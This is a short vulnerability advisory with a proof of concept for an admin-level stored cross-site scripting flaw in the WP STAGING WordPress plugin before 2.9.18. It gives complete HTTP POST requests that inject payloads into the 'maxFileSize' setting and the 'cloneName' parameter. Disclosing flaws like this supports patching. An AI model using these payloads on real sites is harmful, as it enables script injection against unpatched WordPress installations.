WP STAGING < 2.9.18 - Admin+ Stored Cross-Site Scripting

Proof of Concept

With the web browser inspector, change the input field type of settings such as "Maximum File Size (MB)" from number to text, then put the following payload in it and save: ' style=animation-name:rotation onanimationstart=alert(/XSS/)//

POST /wp-admin/options.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 401
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

option_page=wpstg_settings&action=update&_wpnonce=174962afdc&wpstg_settings%5BqueryLimit%5D=10000&wpstg_settings%5BquerySRLimit%5D=20000&wpstg_settings%5BfileLimit%5D=50&wpstg_settings%5BmaxFileSize%5D=%27+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28%2FXSS%2F%29%2F%2F&wpstg_settings%5BbatchSize%5D=2&wpstg_settings%5BcpuLoad%5D=low&wpstg_settings%5Boptimizer%5D=1&submit=Save+Changes

The XSS will be triggered when accessing the settings again

The cloneName parameter is also affected when sent directly:

POST /wp-admin/admin-ajax.php?action=wpstg_processing&_=1660050565.855 HTTP/1.1
Accept: text/html, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 167
Connection: close
Cookie: [admin+]

action=wpstg_cloning&accessToken=YgABqYyPC6Mru2kCQY4qI0mVfMxGxTopA6aR8GJJcsGvUCibhaqJWl5TDjIZfjVc&nonce=eb3be2f317&cloneID=ID&cloneName="><script>alert(/XSS/)</script>

The XSS will be triggered when viewing the Staging Site dashboard (and there is also a lack of escaping when updating the related Staging site)